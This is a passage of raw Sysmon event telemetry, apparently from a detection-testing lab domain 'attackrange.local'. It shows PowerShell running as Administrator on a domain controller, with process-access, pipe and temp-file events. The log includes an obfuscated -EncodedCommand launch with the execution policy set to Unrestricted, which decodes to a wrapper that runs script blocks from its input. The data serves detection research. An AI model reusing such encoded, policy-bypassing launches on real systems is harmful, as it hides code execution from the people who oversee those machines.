JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-643E-6064-F4EC-110000000000}0x11ecf40HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.794{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.794{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x8000000000000000394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 11:59:58.778{266CAFBE-643E-6064-D002-00000000AD01}3320\PSHost.132616655987129695.3320.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.763{266CAFBE-643E-6064-D002-00000000AD01}3320ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_e3mbgjfw.wdc.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.763{266CAFBE-643E-6064-D002-00000000AD01}3320ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_xsgpycag.qye.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.747{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_xsgpycag.qye.ps12021-03-31 11:59:58.747 10341000x8000000000000000390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.731{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.716{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.716{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.716{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-643E-6064-CE02-00000000AD01}21644624C:\Windows\system32\conhost.exe{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 